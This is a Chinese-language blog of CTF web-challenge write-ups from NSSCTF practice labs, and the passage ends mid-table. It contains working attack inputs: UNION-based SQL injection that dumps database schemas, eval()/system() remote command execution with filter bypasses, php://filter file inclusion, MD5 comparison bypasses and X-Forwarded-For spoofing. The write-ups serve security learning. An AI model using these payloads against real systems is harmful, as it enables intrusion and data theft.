<li><a href="#425_swpuctf-2021-%E6%96%B0%E7%94%9F%E8%B5%9Bbabyrce-%E7%A9%BA%E6%A0%BC%E7%BB%95%E8%BF%87-%E7%BB%95%E8%BF%87-%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E5%87%BD%E6%95%B0">425_[SWPUCTF 2021 新生赛]babyrce –空格绕过 –&#x2F;绕过 –命令执行函数</a></li>
<li><a href="#344_%E7%AC%AC%E4%BA%94%E7%A9%BA%E9%97%B4-2021webftp-%E7%9B%AE%E5%BD%95%E6%89%AB%E6%8F%8F-phpinfo">344_[第五空间 2021]WebFTP –目录扫描 –phpinfo()</a></li>
<li><a href="#426_swpuctf-2021-%E6%96%B0%E7%94%9F%E8%B5%9Bez_unserialize-%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96-%E5%AF%B9%E8%B1%A1%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E5%AD%97%E4%B8%B2%E8%A7%A3%E8%AF%BB">426_[SWPUCTF 2021 新生赛]ez_unserialize –反序列化 –对象反序列化字串解读</a></li>
<li><a href="#423_swpuctf-2021-%E6%96%B0%E7%94%9F%E8%B5%9Beasyupload20-%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0-%E6%96%87%E4%BB%B6%E5%90%8E%E7%BC%80%E7%BB%95%E8%BF%87">423_[SWPUCTF 2021 新生赛]easyupload2.0 –文件上传 –文件后缀绕过</a></li>
<li><a href="#3865_litctf-2023php%E6%98%AF%E4%B8%96%E7%95%8C%E4%B8%8A%E6%9C%80%E5%A5%BD%E7%9A%84%E8%AF%AD%E8%A8%80">3865_[LitCTF 2023]PHP是世界上最好的语言！！</a></li>
<li><a href="#388_swpuctf-2021-%E6%96%B0%E7%94%9F%E8%B5%9Beasyupload10-%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0-phpinfo%E7%9B%B4%E5%87%BA-mime%E7%BB%95%E8%BF%87">388_[SWPUCTF 2021 新生赛]easyupload1.0 –文件上传 –phpinfo()直出 –MIME绕过</a></li>
<li><a href="#3863_litctf-2023%E5%AF%BC%E5%BC%B9%E8%BF%B7%E8%B8%AA-%E4%B8%8D%E7%9F%A5%E9%81%93%E6%80%8E%E4%B9%88%E8%AF%84%E4%BB%B7">3863_[LitCTF 2023]导弹迷踪 –不知道怎么评价</a></li>
<li><a href="#429_swpuctf-2021-%E6%96%B0%E7%94%9F%E8%B5%9Bno_wakeup-%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96-%E9%AD%94%E6%9C%AF%E6%96%B9%E6%B3%95%E7%BB%95%E8%BF%87-__wakeup%E7%BB%95%E8%BF%87">429_[SWPUCTF 2021 新生赛]no_wakeup –反序列化 –魔术方法绕过 –<code>__wakeup()</code>绕过</a></li>
<li><a href="#441_swpuctf-2021-%E6%96%B0%E7%94%9F%E8%B5%9Bpseudoprotocols-php%E4%BC%AA%E5%8D%8F%E8%AE%AE-file_get_contents-%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB%E6%BC%8F%E6%B4%9E-datatextplain%E4%BC%AA%E5%8D%8F%E8%AE%AE">441_[SWPUCTF 2021 新生赛]PseudoProtocols –PHP伪协议 –file_get_contents() –文件包含漏洞 –data:&#x2F;&#x2F;text&#x2F;plain伪协议</a></li>
<li><a href="#958_nctf-2018%E7%AD%BE%E5%88%B0%E9%A2%98">958_[NCTF 2018]签到题</a></li>
<li><a href="#2011_nisactf-2022easyssrf-php%E4%BC%AA%E5%8D%8F%E8%AE%AE-ssrf%E6%BC%8F%E6%B4%9E-stristr">2011_[NISACTF 2022]easyssrf –PHP伪协议 –SSRF漏洞 –stristr()</a></li>
<li><a href="#3864_litctf-2023follow-me-and-hack-me">3864_[LitCTF 2023]Follow me and hack me</a></li>
<li><a href="#3873_litctf-2023ping-ping%E5%91%BD%E4%BB%A4%E6%B3%A8%E5%85%A5">3873_[LitCTF 2023]Ping –ping命令注入</a></li>
<li><a href="#713_bjdctf-2020easy_md5-%E5%BC%B1%E6%AF%94%E8%BE%83-%E6%95%B0%E7%BB%84%E7%BB%95%E8%BF%87-md5-mysql%E7%89%B9%E6%80%A7">713_[BJDCTF 2020]easy_md5 –弱比较 –数组绕过 –md5() –MySQL特性</a></li>
<li><a href="#2074_nssctf-2022-spring-recruitezgame">2074_[NSSCTF 2022 Spring Recruit]ezgame</a></li>
<li><a href="#19_suctf-2019easysql-sql%E6%B3%A8%E5%85%A5-sql%E6%B3%A8%E5%85%A5%E7%B1%BB%E5%9E%8B-%E5%A0%86%E5%8F%A0%E6%B3%A8%E5%85%A5">19_[suctf 2019]EasySQL –SQL注入 –SQL注入类型 –堆叠注入</a></li>
<li><a href="#22_zjctf-2019nizhuansiwei-php%E4%BC%AA%E5%8D%8F%E8%AE%AE-file_get_contents-%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96-preg_match-%E6%9C%89%E9%97%AE%E9%A2%98%E5%B0%9A%E6%9C%AA%E8%A7%A3%E5%86%B3">22_[ZJCTF 2019]NiZhuanSiWei –PHP伪协议 –file_get_contents() –反序列化 –preg_match() –有问题尚未解决</a></li>
<li><a href="#1096_gxyctf-2019ping-ping-ping-ping%E5%91%BD%E4%BB%A4%E6%B3%A8%E5%85%A5-%E7%A9%BA%E6%A0%BC%E7%BB%95%E8%BF%87-flag%E5%AD%97%E4%B8%B2%E7%BB%95%E8%BF%87">1096_[GXYCTF 2019]Ping Ping Ping –ping命令注入 –空格绕过 –flag字串绕过</a></li>
</ul>
<!-- tocstop -->

<h2><span id="382_swpuctf-2021-新生赛gift_f12">382_[SWPUCTF 2021 新生赛]gift_F12</span></h2><p>&emsp;&emsp;进入环境，根据题目提示，F12检查，在文本中使用<span style="background-color: yellow;">ctrl+F</span>查找关键字flag即可</p>
<img src="/2024/11/07/NSSCTF-Web%E5%81%9A%E9%A2%98%E7%AC%94%E8%AE%B0/382_%E7%BB%93%E6%9E%9C%E5%B1%95%E7%A4%BA.png" class title="382_结果展示">

<h2><span id="384_swpuctf-2021-新生赛jicao">384_[SWPUCTF 2021 新生赛]jicao</span></h2><p>&emsp;&emsp;进入环境得到PHP代码，审查传入的两个参数“id”和“json”</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">highlight_file(&#x27;index.php&#x27;);</span><br><span class="line">include(&quot;flag.php&quot;);</span><br><span class="line">$id=$_POST[&#x27;id&#x27;];                        // id需以POST方式传入</span><br><span class="line">$json=json_decode($_GET[&#x27;json&#x27;],true);   // json需以GET方式传入，且其格式需要符合json字符串格式</span><br><span class="line">if ($id==&quot;wllmNB&quot;&amp;&amp;$json[&#x27;x&#x27;]==&quot;wllm&quot;)   // id值为&quot;wllmNB&quot;，json值为&#123;&quot;x&quot;:&quot;wllm&quot;&#125;</span><br><span class="line">&#123;echo $flag;&#125;                            // 均正确即输出flag</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>

<p>&emsp;&emsp;选择Firefox，使用HackBar，加载地址后选择“Post data”，在网址后写入GET参数，在下方框中写入POST参数，点击execute执行得到flag</p>
<img src="/2024/11/07/NSSCTF-Web%E5%81%9A%E9%A2%98%E7%AC%94%E8%AE%B0/384_%E7%BB%93%E6%9E%9C%E5%B1%95%E7%A4%BA.png" class title="384_结果展示">

<h2><span id="386_swpuctf-2021-新生赛easy_md5-弱比较-数组绕过">386_[SWPUCTF 2021 新生赛]easy_md5 –弱比较 –数组绕过</span></h2><p>&emsp;&emsp;进入环境得到PHP代码，审计发现关键代码如下</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="variable">$name</span> = <span class="variable">$_GET</span>[<span class="string">&#x27;name&#x27;</span>];                    <span class="comment"># 接受GET方式传入的name参数</span></span><br><span class="line"><span class="variable">$password</span> = <span class="variable">$_POST</span>[<span class="string">&#x27;password&#x27;</span>];           <span class="comment"># 接受POST方式传入的password参数</span></span><br><span class="line"><span class="keyword">if</span> (<span class="variable">$name</span> != <span class="variable">$password</span> &amp;&amp; <span class="title function_ invoke__">md5</span>(<span class="variable">$name</span>) == <span class="title function_ invoke__">md5</span>(<span class="variable">$password</span>))&#123;</span><br><span class="line">    <span class="keyword">echo</span> <span class="variable">$flag</span>;                           <span class="comment"># 如果两参数不同而MD5码相同，=&gt; flag</span></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>&emsp;&emsp;<strong>法1</strong>：通用法，数组绕过，原理是利用md5()函数无法对数组加密，当参数为数组时，md5()会直接返回null，故等式两边均为null，&#x3D;&gt; True</p>
<p>&emsp;&emsp;<strong>法2</strong>：适用于强比较“&#x3D;&#x3D;&#x3D;”，构造两个MD5码相同的不同字符串，构造原理是MD5码碰撞</p>
<p>&emsp;&emsp;<strong>法3</strong>：适用于弱比较“&#x3D;&#x3D;”，构造两个不同字符串，其MD5码<span style="background-color: yellow;">以“0e”开头且“0e”后无字母</span>；此类字符串在被用于比较或算术运算时，PHP会尝试将它们转换为数字；因为”0e”在PHP中被解释为科学计数法，且0的任何正整数次方都为0，故当两个参数的MD5码均为“0e”开头时，等式两边均为0，&#x3D;&gt; True</p>
<p>&emsp;&emsp;由代码易知本题为MD5码的弱比较，适用法1<span style="background-color: yellow;">(name[]&#x3D;123, password[]&#x3D;1)</span>、法3，以下给出符合法3要求的一些字符串，任意输入两个作为name和password即得到flag</p>
<table>
<thead>
<tr>
<th align="center">字符串</th>
<th align="center">MD5哈希值</th>
</tr>
</thead>
<tbody><tr>
<td align="center">MMHUWUV</td>
<td align="center">0e701732711630150438129209816536</td>
</tr>
<tr>
<td align="center">MAUXXQC</td>
<td align="center">0e478478466848439040434801845361</td>
</tr>
<tr>
<td align="center">IHKFRNS</td>
<td align="center">0e256160682445802696926137988570</td>
</tr>
</tbody></table>
<img src="/2024/11/07/NSSCTF-Web%E5%81%9A%E9%A2%98%E7%AC%94%E8%AE%B0/386_%E7%BB%93%E6%9E%9C%E5%B1%95%E7%A4%BA.png" class title="386_结果展示">

<h2><span id="427_swpuctf-2021-新生赛include-php伪协议-文件包含漏洞">427_[SWPUCTF 2021 新生赛]include –PHP伪协议 –文件包含漏洞</span></h2><p>&emsp;&emsp;根据提示传入file参数，得到PHP代码，得到flag位置：flag.php</p>
<p>&emsp;&emsp;由题目提示，本题知识点为文件包含漏洞，需构造PHP伪协议来获取指定文件源码，其通式如下：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">变量=php://filter/read=过滤器/resource=目标文件</span><br></pre></td></tr></table></figure>

<p>&emsp;&emsp;大多数情况下，过滤器使用convert.base64-encode，博主也遇到过在过滤器上做文章的题，不过本题不是</p>
<p>&emsp;&emsp;于是根据通式构建本题题解“变量&#x3D;php:&#x2F;&#x2F;filter&#x2F;read&#x3D;convert.base64-encode&#x2F;resource&#x3D;flag.php”，得到Base64字符串</p>
<img src="/2024/11/07/NSSCTF-Web%E5%81%9A%E9%A2%98%E7%AC%94%E8%AE%B0/427_Base64%E7%A0%81%E5%B1%95%E7%A4%BA.png" class title="427_Base64码展示">

<p>&emsp;&emsp;利用在线工具进行Base64解码，得到flag：NSSCTF{3beb5044-dd5e-4c2c-828c-52e2dad60765}</p>
<h2><span id="387_swpuctf-2021-新生赛easy_sql-字符型注入">387_[SWPUCTF 2021 新生赛]easy_sql –字符型注入</span></h2><p>&emsp;&emsp;进入环境，根据标签页名提示，随机输入参数wllm&#x3D;1，显示信息；据题目名字可知为SQL注入，先尝试传参判断注入类型</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">/?wllm=1                  # 出现提示</span><br><span class="line">/?wllm=2                  # 提示消失</span><br><span class="line">/?wllm=1&#x27; and 1=1         # 报错</span><br><span class="line">/?wllm=1&#x27; and &#x27;1&#x27;=&#x27;1      # 显示同传入参数1一致，故为字符型注入</span><br></pre></td></tr></table></figure>

<p>&emsp;&emsp;利用<span style="background-color: yellow;">“order by”</span>语句获得当前表的字段数(列数)</p>
<p>&emsp;&emsp;<strong>order by</strong>：根据表的第几列数据来进行表数据的排序；当然，如果列数不存在，肯定会报错</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">/?wllm=1&#x27; order by 1~10          # 信息未改变，推测这里存在对1的限制</span><br><span class="line">/?wllm=2&#x27; order by 1             # 出现报错，使用--+注释后续语句</span><br><span class="line">/?wllm=2&#x27; order by 1 --+         # 信息消失，继续测试</span><br><span class="line">/?wllm=2&#x27; order by 2 --+</span><br><span class="line">/?wllm=2&#x27; order by 3 --+</span><br><span class="line">/?wllm=2&#x27; order by 4 --+         # 出现列数报错，说明表有3列</span><br></pre></td></tr></table></figure>

<p>&emsp;&emsp;由于“select”语句特性，即<strong>当SELECT语句中包含静态值时，数据库会将这些值作为查询结果的一部分返回</strong>；结合列数，利用“union”构造语句查找回显点，即找出程序会返回表的哪几列</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">/?wllm=2&#x27; union select 1,2,3 --+         # 得到回显点反馈如下</span><br></pre></td></tr></table></figure>

<img src="/2024/11/07/NSSCTF-Web%E5%81%9A%E9%A2%98%E7%AC%94%E8%AE%B0/387_%E5%9B%9E%E6%98%BE%E7%82%B9%E5%B1%95%E7%A4%BA.png" class title="387_回显点展示">

<p>&emsp;&emsp;由图知，程序返回第2&#x2F;3列数据，据此探查数据库基本信息</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"># 返回当前数据库名</span><br><span class="line">/?wllm=2&#x27; union select 1,2,database() --+</span><br></pre></td></tr></table></figure>

<img src="/2024/11/07/NSSCTF-Web%E5%81%9A%E9%A2%98%E7%AC%94%E8%AE%B0/387_%E5%BD%93%E5%89%8D%E6%95%B0%E6%8D%AE%E5%BA%93%E5%90%8D.png" class title="387_当前数据库名">

<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"># 返回所有数据库名</span><br><span class="line">/?wllm=2&#x27; union select 1,2,group_concat(schema_name) from information_schema.schemata --+</span><br></pre></td></tr></table></figure>

<img src="/2024/11/07/NSSCTF-Web%E5%81%9A%E9%A2%98%E7%AC%94%E8%AE%B0/387_%E6%89%80%E6%9C%89%E6%95%B0%E6%8D%AE%E5%BA%93%E5%90%8D.png" class title="387_所有数据库名">

<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"># 测试test_db，返回库中所有表的表名</span><br><span class="line">/?wllm=2&#x27; union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=&#x27;test_db&#x27; --+</span><br></pre></td></tr></table></figure>

<img src="/2024/11/07/NSSCTF-Web%E5%81%9A%E9%A2%98%E7%AC%94%E8%AE%B0/387_%E6%89%80%E6%9C%89%E8%A1%A8%E5%90%8D.png" class title="387_所有表名">

<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"># 测试两个表的所有列(字段)，找到flag位置</span><br><span class="line">/?wllm=2&#x27; union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=&#x27;test_db&#x27; and table_name=&#x27;test_tb&#x27; --+</span><br><span class="line">/?wllm=2&#x27; union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=&#x27;test_db&#x27; and table_name=&#x27;users&#x27; --+</span><br></pre></td></tr></table></figure>

<img src="/2024/11/07/NSSCTF-Web%E5%81%9A%E9%A2%98%E7%AC%94%E8%AE%B0/387_test_tb%E6%89%80%E6%9C%89%E5%88%97.png" class title="387_test_tb所有列">

<img src="/2024/11/07/NSSCTF-Web%E5%81%9A%E9%A2%98%E7%AC%94%E8%AE%B0/387_users%E6%89%80%E6%9C%89%E5%88%97.png" class title="387_users所有列">

<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"># 直接查询flag</span><br><span class="line">/?wllm=2&#x27; union select 1,2,flag from test_tb --+</span><br></pre></td></tr></table></figure>

<img src="/2024/11/07/NSSCTF-Web%E5%81%9A%E9%A2%98%E7%AC%94%E8%AE%B0/387_%E7%BB%93%E6%9E%9C%E5%B1%95%E7%A4%BA.png" class title="387_结果展示">

<h2><span id="424_swpuctf-2021-新生赛easyrce-eval-命令执行函数">424_[SWPUCTF 2021 新生赛]easyrce –eval() –命令执行函数</span></h2><p>&emsp;&emsp;进入环境得到PHP代码，审计发现程序中使用eval()函数</p>
<p>&emsp;&emsp;<strong>eval()函数允许将传入的字符串作为PHP代码执行</strong>，本题即利用此点，以下是博主编文至此使用过的的eval()中使用的命令执行函数</p>
<table>
<thead>
<tr>
<th align="center">命令执行函数</th>
<th align="center">参数说明</th>
<th align="center">使用效果</th>
</tr>
</thead>
<tbody><tr>
<td align="center">system()</td>
<td align="center">传入一个shell语句字符串</td>
<td align="center">直接返回shell语句运行结果</td>
</tr>
<tr>
<td align="center">$x &#x3D; popen()</td>
<td align="center">第一个参数为路径，第二个参数为模式(r、w)</td>
<td align="center">以读写模式打开一个到外部命令的管道，并返回</td>
</tr>
<tr>
<td align="center">exec()</td>
<td align="center">传入一个shell语句字符串</td>
<td align="center">执行语句但不返回结果</td>
</tr>
</tbody></table>
<p>&emsp;&emsp;先通过system()来尝试获取目录结构</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">/?url=system(&quot;ls /&quot;);</span><br></pre></td></tr></table></figure>

<img src="/2024/11/07/NSSCTF-Web%E5%81%9A%E9%A2%98%E7%AC%94%E8%AE%B0/424_%E7%9B%AE%E5%BD%95%E7%BB%93%E6%9E%84.png" class title="424_目录结构">

<p>&emsp;&emsp;直接读取flag所处文件，得到flag</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">/?url=system(&quot;cat /flllllaaaaaaggggggg&quot;);</span><br></pre></td></tr></table></figure>

<img src="/2024/11/07/NSSCTF-Web%E5%81%9A%E9%A2%98%E7%AC%94%E8%AE%B0/424_%E7%BB%93%E6%9E%9C%E5%B1%95%E7%A4%BA.png" class title="424_结果展示">

<h2><span id="383_swpuctf-2021-新生赛caidao-同424">383_[SWPUCTF 2021 新生赛]caidao –同424</span></h2><p>&emsp;&emsp;做法完全同424，只需要以POST方式传入参数wllm，省略</p>
<h2><span id="3861_litctf-2023我flag呢">3861_[LitCTF 2023]我Flag呢？</span></h2><p>&emsp;&emsp;做法完全同382，按F12搜索flag关键字即可，省略</p>
<h2><span id="385_swpuctf-2021-新生赛do_you_know_http-http浏览器修改-http请求ip更改">385_[SWPUCTF 2021 新生赛]Do_you_know_http –HTTP浏览器修改 –HTTP请求IP更改</span></h2><p>&emsp;&emsp;进入环境得到提示，结合题目，使用BurpSuite对HTTP数据包进行抓取并修改，以下为关键数据的按行解读</p>
<table>
<thead>
<tr>
<th align="center">行号</th>
<th align="center">请求信息</th>
<th align="center">解读</th>
</tr>
</thead>
<tbody><tr>
<td align="center">1</td>
<td align="center">GET &#x2F;hello.php HTTP&#x2F;1.1</td>
<td align="center">这是一个GET请求，请求的资源是&#x2F;hello.php，使用的HTTP版本是1.1</td>
</tr>
<tr>
<td align="center">2</td>
<td align="center">Host:</td>
<td align="center">请求的目标主机和端口号</td>
</tr>
<tr>
<td align="center">3</td>
<td align="center">Accept-Language:</td>
<td align="center">请求者希望服务器返回的语种</td>
</tr>
<tr>
<td align="center">4</td>
<td align="center">User-Agent:</td>
<td align="center">请求者的用户代理信息，包括操作系统、浏览器类型和版本号等</td>
</tr>
<tr>
<td align="center">5</td>
<td align="center">Accept:</td>
<td align="center">请求者可以接受的媒体类型</td>
</tr>
<tr>
<td align="center">6</td>
<td align="center">Accept-Encoding:</td>
<td align="center">请求者可以接受的内容编码类型</td>
</tr>
</tbody></table>
<p>&emsp;&emsp;题目要求使用WLLM浏览器，故修改“User-Agent”信息头的信息为WLLM，得到Response信息如下</p>
<img src="/2024/11/07/NSSCTF-Web%E5%81%9A%E9%A2%98%E7%AC%94%E8%AE%B0/385_WLLMresponse.png" class title="385_WLLMresponse">

<p>&emsp;&emsp;观察到Location信息头返回了一个新的.php文件，访问</p>
<img src="/2024/11/07/NSSCTF-Web%E5%81%9A%E9%A2%98%E7%AC%94%E8%AE%B0/385_a.php%E8%AE%BF%E9%97%AE.png" class title="385_a.php访问">

<p>&emsp;&emsp;根据提示，需要在“local”，也就是主机本地才能访问得到下一步提示，故需修改客户端IP为127.0.0.1</p>
<p>&emsp;&emsp;网上查阅得知，<strong>指定请求方真实IP的方式：添加信息头X-Forwarded-For</strong></p>
<p>&emsp;&emsp;<strong>附：X-Forwarded-For: client1, proxy1, proxy2, …</strong></p>
<table>
<thead>
<tr>
<th align="center">参数名</th>
<th align="center">含义</th>
</tr>
</thead>
<tbody><tr>
<td align="center">client</td>
<td align="center">客户端的真实IP地址</td>
</tr>
<tr>
<td align="center">proxy</td>
<td align="center">经过的代理或负载均衡器的IP地址</td>
</tr>
</tbody></table>
<img src="/2024/11/07/NSSCTF-Web%E5%81%9A%E9%A2%98%E7%AC%94%E8%AE%B0/385_IP%E4%BF%AE%E6%94%B9.png" class title="385_IP修改">

<p>&emsp;&emsp;进入新给出的.php文件，得到flag</p>
<img src="/2024/11/07/NSSCTF-Web%E5%81%9A%E9%A2%98%E7%AC%94%E8%AE%B0/385_%E7%BB%93%E6%9E%9C%E5%B1%95%E7%A4%BA.png" class title="385_结果展示">

<h2><span id="425_swpuctf-2021-新生赛babyrce-空格绕过-x2f绕过-命令执行函数">425_[SWPUCTF 2021 新生赛]babyrce –空格绕过 –&#x2F;绕过 –命令执行函数</span></h2><p>&emsp;&emsp;进入环境得到PHP代码，审计发现要求修改cookie，输入admin&#x3D;1，利用HackBar完成，execute执行后得到提示</p>
<img src="/2024/11/07/NSSCTF-Web%E5%81%9A%E9%A2%98%E7%AC%94%E8%AE%B0/425_%E6%96%B0%E6%96%87%E4%BB%B6%E6%8F%90%E7%A4%BA.png" class title="425_新文件提示">

<img src="/2024/11/07/NSSCTF-Web%E5%81%9A%E9%A2%98%E7%AC%94%E8%AE%B0/425_%E6%96%B0PHP%E4%BB%A3%E7%A0%81.png" class title="425_新PHP代码">

<p>&emsp;&emsp;进入新的.php文件，审计代码发现命令执行函数shell_exec()，其将结果存于变量中，再输出该变量</p>
<p>&emsp;&emsp;审计代码还能发现程序将空格与斜杠符”&#x2F;“屏蔽，故需要绕过，这里学到的是通过url编码字符进行绕过，查阅知</p>
<table>
<thead>
<tr>
<th align="center">字符</th>
<th align="center">URL编码</th>
</tr>
</thead>
<tbody><tr>
<td align="center">空格</td>
<td align="center">%09</td>
</tr>
<tr>
<td align="center">&#x2F;</td>
<td align="center">%2f</td>
</tr>
</tbody></table>
<p>&emsp;&emsp;故构造shell语句传入参数url中，获取基础信息</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"># 获取目录结构</span><br><span class="line">/rasalghul.php?url=ls%09%2f</span><br></pre></td></tr></table></figure>

<img src="/2024/11/07/NSSCTF-Web%E5%81%9A%E9%A2%98%E7%AC%94%E8%AE%B0/425_%E7%9B%AE%E5%BD%95%E7%BB%93%E6%9E%84.png" class title="425_目录结构">

<p>&emsp;&emsp;利用cat命令输出目标文件，得到flag</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"># 输出目标文件</span><br><span class="line">/rasalghul.php?url=cat%09%2fflllllaaaaaaggggggg</span><br></pre></td></tr></table></figure>

<img src="/2024/11/07/NSSCTF-Web%E5%81%9A%E9%A2%98%E7%AC%94%E8%AE%B0/425_%E7%BB%93%E6%9E%9C%E5%B1%95%E7%A4%BA.png" class title="425_结果展示">

<h2><span id="344_第五空间-2021webftp-目录扫描-phpinfo">344_[第五空间 2021]WebFTP –目录扫描 –phpinfo()</span></h2><p>&emsp;&emsp;进入环境，无明显提示，F12搜素关键字也无果，对两个输入框初步尝试仍然没有头绪，扫描目录(自己写了个，练练手ʕ ᵔᴥᵔ ʔ)发现线索</p>
<img src="/2024/11/07/NSSCTF-Web%E5%81%9A%E9%A2%98%E7%AC%94%E8%AE%B0/344_%E7%9B%AE%E5%BD%95%E6%89%AB%E6%8F%8F%E7%BB%93%E6%9E%9C.png" class title="344_目录扫描结果">

<p>&emsp;&emsp;结果显示有两个关键文件存在，先查看phpinfo.php，ctrl+F搜索flag关键字得到答案</p>
<img src="/2024/11/07/NSSCTF-Web%E5%81%9A%E9%A2%98%E7%AC%94%E8%AE%B0/344_%E7%BB%93%E6%9E%9C%E5%B1%95%E7%A4%BA.png" class title="344_结果展示">

<h2><span id="426_swpuctf-2021-新生赛ez_unserialize-反序列化-对象反序列化字串解读">426_[SWPUCTF 2021 新生赛]ez_unserialize –反序列化 –对象反序列化字串解读</span></h2><p>&emsp;&emsp;进入环境，欣赏半分钟胡桃摇，无果，开始扫描目录 &#x3D;&gt; 嗯？这么快？</p>
<img src="/2024/11/07/NSSCTF-Web%E5%81%9A%E9%A2%98%E7%AC%94%E8%AE%B0/426_%E7%9B%AE%E5%BD%95%E6%89%AB%E6%8F%8F%E7%BB%93%E6%9E%9C.png" class title="426_目录扫描结果">

<p>&emsp;&emsp;对两个关键文件都进行搜索，flag.php为空，robots.txt给出了提示信息</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">User-agent: *</span><br><span class="line">Disallow: /cl45s.php</span><br></pre></td></tr></table></figure>

<p>&emsp;&emsp;进入提示.php文件，得到PHP代码，行，没见过反序列化，开始学，以下是据本题所学到的对象序列化字串的格式及解读，日后的日后再说</p>
<img src="/2024/11/07/NSSCTF-Web%E5%81%9A%E9%A2%98%E7%AC%94%E8%AE%B0/426_PHP%E4%BB%A3%E7%A0%81%E5%B1%95%E7%A4%BA.png" class title="426_PHP代码展示">

<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># 示例</span></span><br><span class="line">?php</span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">test</span></span>&#123;</span><br><span class="line">    <span class="keyword">protected</span> <span class="variable">$a</span>;</span><br><span class="line">    <span class="keyword">private</span> <span class="variable">$b</span>;</span><br><span class="line">    <span class="function"><span class="keyword">function</span> <span class="title">__construct</span>(<span class="params"></span>)</span>&#123;<span class="variable language_">$this</span>-&gt;a = <span class="string">&quot;xiaoshizi&quot;</span>;<span class="variable language_">$this</span>-&gt;b=<span class="string">&quot;laoshizi&quot;</span>;&#125;</span><br><span class="line">    <span class="function"><span class="keyword">function</span> <span class="title">happy</span>(<span class="params"></span>)</span>&#123;<span class="keyword">return</span> <span class="variable language_">$this</span>-&gt;a;&#125;</span><br><span class="line">&#125;</span><br><span class="line"><span class="variable">$a</span> = <span class="keyword">new</span> <span class="title function_ invoke__">test</span>();</span><br><span class="line"><span class="keyword">echo</span> <span class="title function_ invoke__">serialize</span>(<span class="variable">$a</span>);</span><br><span class="line"><span class="keyword">echo</span> <span class="title function_ invoke__">urlencode</span>(<span class="title function_ invoke__">serialize</span>(<span class="variable">$a</span>));</span><br><span class="line"><span class="meta">?&gt;</span></span><br><span class="line"><span class="comment"># 结果</span></span><br><span class="line">O:<span class="number">4</span>:<span class="string">&quot;test&quot;</span>:<span class="number">2</span>:&#123;s:<span class="number">4</span>:<span class="string">&quot; * a&quot;</span>;s:<span class="number">9</span>:<span class="string">&quot;xiaoshizi&quot;</span>;s:<span class="number">7</span>:<span class="string">&quot; test b&quot;</span>;s:<span class="number">8</span>:<span class="string">&quot;laoshizi&quot;</span>;&#125;</span><br></pre></td></tr></table></figure>

<table>
<thead>
<tr>
<th align="center">字符</th>
<th align="center">解读</th>
</tr>
</thead>
<tbody><tr>
<td align="center">O:</td>
<td align="center">表示序列化的元素是对象</td>
</tr>
<tr>
<td align="center">4:</td>
<td align="center">表示对象的类名为4个字符</td>
</tr>
<tr>
<td align="center">“test”:</td>
<td align="center">对象的类名</td>
</tr>
<tr>
<td align="center">2:</td>
<td align="center">表示对象有两个属性</td>
</tr>
<tr>
<td align="center">s:</td>
<td align="center">第一个属性名，肯定是字符型</td>
</tr>
<tr>
<td align="center">4:</td>
<td align="center">第一个属性名有4个字符</td>
</tr>
<tr>
